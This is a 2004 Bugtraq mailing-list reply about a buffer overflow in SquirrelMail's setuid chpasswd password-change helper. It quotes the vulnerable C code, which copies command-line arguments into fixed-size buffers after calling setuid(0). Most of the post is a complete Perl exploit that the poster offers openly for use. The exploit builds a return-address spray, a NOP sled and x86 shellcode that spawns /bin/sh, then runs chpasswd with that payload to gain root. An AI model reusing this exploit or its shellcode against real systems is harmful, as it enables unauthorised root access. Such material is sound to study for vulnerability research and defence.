Re: Squirrelmail Chpasswod bof

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Squirrelmail Chpasswod bof
From: <rip@xxxxxxxxxxx>
Date: 19 Apr 2004 18:15:46 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

In-Reply-To: <20040417193848.GA31925@xxxxxxxxxxxxxxxxx>

Hi
>> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?

Certainly, but i admire your courage to ask for such a simple one tho :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024

/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];

/* now let's up our privieledge without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");

/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]);             /* heh */
sprintf(Old_pw,"%s",argv[2]);   /* heh */
sprintf(New_pw,"%s",argv[3]);         /* heh */

/* some humor */
if(!strcmp(User,"root")){
           printf("The %s user cannot be edited for security reasons.\n",User);
        return 4; //the root user cannot be edited for security reasons
}

/* ..  snip .. */
strcpy(PUser,User);     /* heh! */

/* we all see the problems here, no? */
<---snip--->
Some lame 5minute-code, should exploit the same thing Matias did:

<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account 
# or something on the host, heh. this should be pretty selfexplanatory
# - rip
use strict;

my $ret = 0xbffff732;              # ret, worked for me, prolly won't for you. 
change it.
my $length = 190;               # buffer length for smashing without ruining it
my $eipdist = 144;              # distance to overwrite eip
my $offset = 0;         # offset
my $numnops = 10;               # number of nops?
my $nop = "\x90";               # nop
my $pw = 'heh';         # random string, heh, 3 chars for current $ret

# dunno where this came from, it was just lying there.
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68".
                        "\x68\x2f\x2f\x62\x69\x89\xe3\x52".
                        "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

sub generate_string($$$) {
        my ($r, $o, $len) = @_;
        my $buffer;
        my $i;

    my $new_ret = pack('l', ($r + $o));

    for($i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
    for($i = 0; $i < $numnops; ++$i) { $buffer .= $nop; }
    $buffer .= $shellcode;

    return $buffer;
}

if($ARGV[0]) { $offset = $ARGV[0]; }

print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";

my $evil = generate_string($ret, $offset ,$length);
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end---->

- rip

Prev by Date: BitDefender Scan Online(ActiveX) - Remote File Download & Execute & Private Information Disclosure
Next by Date: MS Patches last Wed - SOLUTION
Previous by thread: Re: Squirrelmail Chpasswod bof
Next by thread: Re: Squirrelmail Chpasswod bof
Index(es):
- Date
- Thread